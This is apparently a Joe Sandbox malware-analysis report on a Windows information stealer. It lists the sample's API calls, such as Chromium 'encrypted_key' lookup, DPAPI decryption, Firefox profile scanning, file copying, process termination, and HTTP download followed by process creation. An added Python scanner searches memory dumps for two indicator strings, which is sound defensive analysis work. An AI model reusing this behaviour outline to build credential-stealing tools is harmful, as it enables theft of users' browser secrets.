  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
• StrStrA.SHLWAPI(00000000,?,001B7530,001B687B), ref: 0018D474
• lstrlenA.KERNEL32(?), ref: 0018D487
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
• String ID: ^userContextId=4294967295$moz-extension+++
• API String ID: 161838763-3310892237
• Opcode ID: ddb1d0bd5f24b395d08338e3263041cbbdab5f45af08db61dda0832cc302f837
• Instruction ID: 68dbd204aab46bfa6cb4021f534d4931b713d20e5bc1948f7f9e2d9dd6938cb7
• Opcode Fuzzy Hash: ddb1d0bd5f24b395d08338e3263041cbbdab5f45af08db61dda0832cc302f837
• Instruction Fuzzy Hash: F44195369005299FCF12FFA8ED429DD77B4AF28304F524061F944B7252DB34AE4A8F91
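The function summarised above reads a whole file into a LocalAlloc'd buffer (CreateFileA, GetFileSizeEx, LocalAlloc, ReadFile, CloseHandle) and then calls StrStrA against the strings in its String ID. Joe Sandbox joins distinct strings with `$`, so that field is two indicators, `^userContextId=4294967295` and `moz-extension+++`, both of which are patterns found in Firefox profile data such as the originAttributes column of cookies.sqlite; that is consistent with the report's browser-data harvesting signatures. The following scanner is an added example, not code from the Joe Sandbox report or from the sample: it searches a downloaded memory dump (or a directory of `.sdmp` files, an assumed layout) for those two indicators in both ANSI and UTF-16LE form and prints offsets with surrounding bytes for triage. The demo buffer `SAMPLE_DUMP` is constructed here so the script runs offline.

```python
"""Scan memory dumps for the Firefox-related indicator strings listed in the
report's String ID for this function.

Added example: not code from the Joe Sandbox report or from the analysed
sample. The two indicator strings come from the report; everything else,
including the demo buffer, is constructed for this example.
"""
from __future__ import annotations

import re
import sys
from pathlib import Path
from typing import NamedTuple

# Indicators from the report's "String ID" field. Joe Sandbox separates
# distinct strings with '$', so "^userContextId=4294967295$moz-extension+++"
# is two strings, not one.
INDICATORS: tuple[bytes, ...] = (
    b"^userContextId=4294967295",
    b"moz-extension+++",
)


class Hit(NamedTuple):
    indicator: bytes   # which indicator matched
    encoding: str      # "ansi" or "utf16le"
    offset: int        # byte offset of the match in the scanned buffer
    context: bytes     # bytes around the match, for triage


def _needles(indicator: bytes) -> list[tuple[str, bytes]]:
    """Return the indicator in both forms a Windows process may hold it."""
    wide = indicator.decode("ascii").encode("utf-16-le")
    return [("ansi", indicator), ("utf16le", wide)]


def scan_bytes(data: bytes, context: int = 16) -> list[Hit]:
    """Find every occurrence of each indicator in `data`, sorted by offset.

    The sample calls the ANSI APIs (lstrcpyA, StrStrA), but stealer process
    dumps frequently also hold UTF-16LE copies of the same strings, so both
    encodings are checked.
    """
    hits: list[Hit] = []
    for indicator in INDICATORS:
        for encoding, needle in _needles(indicator):
            for m in re.finditer(re.escape(needle), data):
                lo = max(0, m.start() - context)
                hi = min(len(data), m.end() + context)
                hits.append(Hit(indicator, encoding, m.start(), data[lo:hi]))
    return sorted(hits, key=lambda h: h.offset)


def scan_dumps(directory: Path, pattern: str = "*.sdmp") -> dict[str, list[Hit]]:
    """Scan every dump matching `pattern` under `directory`.

    Assumption (not stated by the report): the .sdmp files have been
    downloaded into one directory. Only files with at least one hit are
    returned, keyed by file name.
    """
    results: dict[str, list[Hit]] = {}
    for path in sorted(directory.glob(pattern)):
        hits = scan_bytes(path.read_bytes())
        if hits:
            results[path.name] = hits
    return results


# Constructed demo buffer (not a real dump): a Firefox profile file name,
# the first indicator as an ANSI string, then the second as a wide string.
SAMPLE_DUMP = (
    b"\x00" * 32
    + b"cookies.sqlite\x00"
    + b"^userContextId=4294967295\x00"
    + b"\x00" * 8
    + "moz-extension+++".encode("utf-16-le")
    + b"\x00" * 8
)


def main(argv: list[str]) -> int:
    # With a directory argument, scan real dumps; otherwise scan the demo buffer.
    if len(argv) > 1:
        results = scan_dumps(Path(argv[1]))
    else:
        results = {"<constructed sample>": scan_bytes(SAMPLE_DUMP)}
    for name, hits in results.items():
        for h in hits:
            print(f"{name}: 0x{h.offset:08x} {h.encoding:8s} {h.indicator!r}  ctx={h.context!r}")
    return 0 if results else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with no arguments to see the two hits in the constructed buffer, or point it at the directory holding the downloaded `.sdmp` files to check which dumps carry the strings. A hit on the wide form with no ANSI counterpart is worth a second look, since this function only calls the ANSI string APIs.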
                                                                                                                                                                        APIs
                                                                                                                                                                        • malloc.MSVCRT ref: 0019BE0A
                                                                                                                                                                        • _memmove.LIBCMT ref: 0019BE1E
                                                                                                                                                                        • _memmove.LIBCMT ref: 0019BE6B
                                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,0019AEB0,?,00000001,?,?,?), ref: 0019BE8A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove$FileWritemalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 803809635-0
                                                                                                                                                                        • Opcode ID: aaae93b94cba0fda43476bf6203154679a9565dd1eb4e6ba498b80845d8bbb2d
                                                                                                                                                                        • Instruction ID: a79e6087a2ba5dd235a0747d7612f5950c9d81f4b132387d18e5d9eda703946d
                                                                                                                                                                        • Opcode Fuzzy Hash: aaae93b94cba0fda43476bf6203154679a9565dd1eb4e6ba498b80845d8bbb2d
                                                                                                                                                                        • Instruction Fuzzy Hash: D0314D71608704AFDB25DF65EAC4AA7B7F8FB48750F50892EE64687A40EB70F9048B50
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 001922AC
                                                                                                                                                                          • Part of subcall function 00191D36: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001922D6,?), ref: 00191D41
                                                                                                                                                                          • Part of subcall function 00191D36: HeapAlloc.KERNEL32(00000000), ref: 00191D48
                                                                                                                                                                          • Part of subcall function 00191D36: wsprintfW.USER32 ref: 00191D59
                                                                                                                                                                        • OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 00192352
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00192360
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00192367
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2224742867-0
                                                                                                                                                                        • Opcode ID: b4dcbbc8b3c6854f8b07d22f7769ae74609232b4e7e6b92c4972c43aa7add1fd
                                                                                                                                                                        • Instruction ID: dda97ee5799aa7414d42a7cbe4486bcf20f14e38f42e72e437e6c71d00dd3197
                                                                                                                                                                        • Opcode Fuzzy Hash: b4dcbbc8b3c6854f8b07d22f7769ae74609232b4e7e6b92c4972c43aa7add1fd
                                                                                                                                                                        • Instruction Fuzzy Hash: 0A312D76A01218ABDF21AFA4DC849EE7BBCFF0A344F0404A6F509E6550D7349F848F52
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
                                                                                                                                                                          • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
                                                                                                                                                                          • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
                                                                                                                                                                          • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
                                                                                                                                                                          • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
                                                                                                                                                                          • Part of subcall function 00191DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00196973,?), ref: 00191E0C
                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0018CC65,?,?), ref: 001881E5
                                                                                                                                                                          • Part of subcall function 00188048: CryptStringToBinaryA.CRYPT32(00186724,00000000,00000001,00000000,?,00000000,00000000), ref: 00188060
                                                                                                                                                                          • Part of subcall function 00188048: LocalAlloc.KERNEL32(00000040,?,?,?,00186724,?), ref: 0018806E
                                                                                                                                                                          • Part of subcall function 00188048: CryptStringToBinaryA.CRYPT32(00186724,00000000,00000001,00000000,?,00000000,00000000), ref: 00188084
                                                                                                                                                                          • Part of subcall function 00188048: LocalFree.KERNEL32(?,?,?,00186724,?), ref: 00188093
                                                                                                                                                                          • Part of subcall function 001880A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0018823B), ref: 001880C4
                                                                                                                                                                          • Part of subcall function 001880A1: LocalAlloc.KERNEL32(00000040,0018823B,?,?,0018823B,0018CB6A,?,?,?,?,?,?,?,0018CC65,?,?), ref: 001880D8
                                                                                                                                                                          • Part of subcall function 001880A1: LocalFree.KERNEL32(0018CB6A,?,?,0018823B,0018CB6A,?,?,?,?,?,?,?,0018CC65,?,?), ref: 001880FD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
• String ID: $"encrypted_key":"$DPAPI
• API String ID: 2311102621-738592651
• Opcode ID: 11fdf69e68a19022bf36fd621960a723dc9ced40297b682c8e7376be946323c2
• Instruction ID: a9192db77dc4dbee27c133c53a4031635f52cd9ff1ef6208b03d680a6c2e7a72
• Opcode Fuzzy Hash: 11fdf69e68a19022bf36fd621960a723dc9ced40297b682c8e7376be946323c2
• Instruction Fuzzy Hash: C1219F32A4060AABDF10FAA4DC41ADDB779EF91360F604665F911A7181DF30AB49CF60
APIs
  • Part of subcall function 00191D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00191DD2
• lstrcatA.KERNEL32(?,00000000), ref: 001966E9
• lstrcatA.KERNEL32(?,001B6B54), ref: 00196706
• lstrcatA.KERNEL32(?), ref: 00196719
• lstrcatA.KERNEL32(?,001B6B58), ref: 0019672B
  • Part of subcall function 00196013: wsprintfA.USER32 ref: 0019605A
  • Part of subcall function 00196013: FindFirstFileA.KERNEL32(?,?), ref: 00196071
  • Part of subcall function 00196013: StrCmpCA.SHLWAPI(?,001B6ABC), ref: 00196092
  • Part of subcall function 00196013: StrCmpCA.SHLWAPI(?,001B6AC0), ref: 001960AC
  • Part of subcall function 00196013: wsprintfA.USER32 ref: 001960D3
  • Part of subcall function 00196013: StrCmpCA.SHLWAPI(?,001B6647), ref: 001960E7
  • Part of subcall function 00196013: wsprintfA.USER32 ref: 00196104
  • Part of subcall function 00196013: PathMatchSpecA.SHLWAPI(?,?), ref: 00196131
  • Part of subcall function 00196013: lstrcatA.KERNEL32(?), ref: 00196167
  • Part of subcall function 00196013: lstrcatA.KERNEL32(?,001B6AD8), ref: 00196179
  • Part of subcall function 00196013: lstrcatA.KERNEL32(?,?), ref: 0019618C
  • Part of subcall function 00196013: lstrcatA.KERNEL32(?,001B6ADC), ref: 0019619E
  • Part of subcall function 00196013: lstrcatA.KERNEL32(?,?), ref: 001961B2
  • Part of subcall function 00196013: wsprintfA.USER32 ref: 0019611B
  • Part of subcall function 00196013: CopyFileA.KERNEL32(?,?,00000001), ref: 0019626B
  • Part of subcall function 00196013: DeleteFileA.KERNEL32(?), ref: 001962DF
  • Part of subcall function 00196013: FindNextFileA.KERNEL32(?,?), ref: 00196341
  • Part of subcall function 00196013: FindClose.KERNEL32(?), ref: 00196355
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
• String ID:
• API String ID: 2104210347-0
• Opcode ID: 0c737c7dacc4e227e2e7143718d4d7edb22cd58d223d10cd6418af6187f27b20
• Instruction ID: 138f541b1ccfad49d428b2c883a45835644c2ff4ef953844a40ea8566686d5d0
• Opcode Fuzzy Hash: 0c737c7dacc4e227e2e7143718d4d7edb22cd58d223d10cd6418af6187f27b20
• Instruction Fuzzy Hash: AA21607690011CABCF51EF64EC86AD97BBDEB24300F4040A2F585A7250EFB49AD58F51
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,001B65B6,?,?,?), ref: 00190CAD
• HeapAlloc.KERNEL32(00000000), ref: 00190CB4
• GetLocalTime.KERNEL32(?), ref: 00190CC0
• wsprintfA.USER32 ref: 00190CEB
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: Heap$AllocLocalProcessTimewsprintf
• String ID:
• API String ID: 1243822799-0
• Opcode ID: 7e833ab2ba643ff3adaa94f11ebf4cf653c5077d94dfd1bddaa6367957943a1a
• Instruction ID: e36f49dc3ecb37f3ddd9f5e737f7956e8e127a6cf110cbb91bf5fe2fa936b750
• Opcode Fuzzy Hash: 7e833ab2ba643ff3adaa94f11ebf4cf653c5077d94dfd1bddaa6367957943a1a
• Instruction Fuzzy Hash: 39F0E1B6901118BBDB51ABE5ED05ABF7BFCAB0CB11F400156F941E6190D6389A80D771
APIs
• CreateFileA.KERNEL32(00194FEC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00194FEC,?), ref: 00192156
• GetFileSizeEx.KERNEL32(00000000,00194FEC,?,?,?,00194FEC,?), ref: 0019216E
• CloseHandle.KERNEL32(00000000,?,?,?,00194FEC,?), ref: 00192179
• CloseHandle.KERNEL32(00000000,?,?,?,00194FEC,?), ref: 00192181
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: CloseFileHandle$CreateSize
• String ID:
• API String ID: 4148174661-0
• Opcode ID: d80622b52417b7e6f8a0a5e4c48b0eb4ed2c5bcc83b16a2521566694c181d71c
• Instruction ID: c7508f3826b3587acf9fc0802637c997537810415a10cc80e5603f7bfacfe289
• Opcode Fuzzy Hash: d80622b52417b7e6f8a0a5e4c48b0eb4ed2c5bcc83b16a2521566694c181d71c
• Instruction Fuzzy Hash: 56F0A731A02215BBFB25BBA0EC49FDE3F6CDB04760F104221FA01EA1D0D7B06A508A91
APIs
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
  • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
  • Part of subcall function 00185237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0018527E
  • Part of subcall function 00185237: RtlAllocateHeap.NTDLL(00000000), ref: 00185285
  • Part of subcall function 00185237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 001852A7
  • Part of subcall function 00185237: StrCmpCA.SHLWAPI(?), ref: 001852C1
  • Part of subcall function 00185237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001852F1
  • Part of subcall function 00185237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00185330
  • Part of subcall function 00185237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00185360
  • Part of subcall function 00185237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0018536B
  • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
  • Part of subcall function 0019241B: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00194ACD), ref: 00192435
• _memset.LIBCMT ref: 00192D1F
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,001B6718), ref: 00192D71
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
• String ID: .exe
• API String ID: 2831197775-4119554291
• Opcode ID: 8654fd85a1821cd296857c7895db7511e649427d857e117f175721ec516bd551
• Instruction ID: 97bb0ee46eabe83f70a65fe2278195f17dd3579c02ff7b3ef2c55a040b8ee27b
• Opcode Fuzzy Hash: 8654fd85a1821cd296857c7895db7511e649427d857e117f175721ec516bd551
• Instruction Fuzzy Hash: B3413B36E00118AFDF12FBA4EC42ACE77B8AF65344F124161FA14B7152DB706E4A8B91
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: Xinvalid_argument_memmovestd::_
• String ID: string too long
• API String ID: 256744135-2556327735
• Opcode ID: 10dc55e90e8b36ade3fe2521829d6b5acd15a1c43e4ebebdfe0172049f4aeceb
• Instruction ID: 3ed4305fde4fb1f684bb0a1807440dbc16ec13b059b32b96e2788b93f44abb5d
• Opcode Fuzzy Hash: 10dc55e90e8b36ade3fe2521829d6b5acd15a1c43e4ebebdfe0172049f4aeceb
• Instruction Fuzzy Hash: 73117075300205AF9B18BE2DD840A79B7ABEF95324B24013DF8118B287D771EE52CBA1
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: malloc
• String ID: image/jpeg
• API String ID: 2803490479-3785015651
• Opcode ID: beec969ceb915eb0738850563984e7f0f02e6dc3697ce254adff15b7a7df6115
• Instruction ID: d6fcef2b0942905c38ddfcf73f2ee279d0e378fbc482be7165ba50ced5977b74
• Opcode Fuzzy Hash: beec969ceb915eb0738850563984e7f0f02e6dc3697ce254adff15b7a7df6115
• Instruction Fuzzy Hash: A1116572904109FBCF12AFA5DC8489EBF79FE46364B21026AE911A7190D7719E849650
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 0018F113
  • Part of subcall function 001AEC95: std::exception::exception.LIBCMT ref: 001AECAA
  • Part of subcall function 001AEC95: __CxxThrowException@8.LIBCMT ref: 001AECBF
  • Part of subcall function 001AEC95: std::exception::exception.LIBCMT ref: 001AECD0
  • Part of subcall function 0018F20D: std::_Xinvalid_argument.LIBCPMT ref: 0018F217
• _memmove.LIBCMT ref: 0018F165
Strings
• invalid string position, xrefs: 0018F10E
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
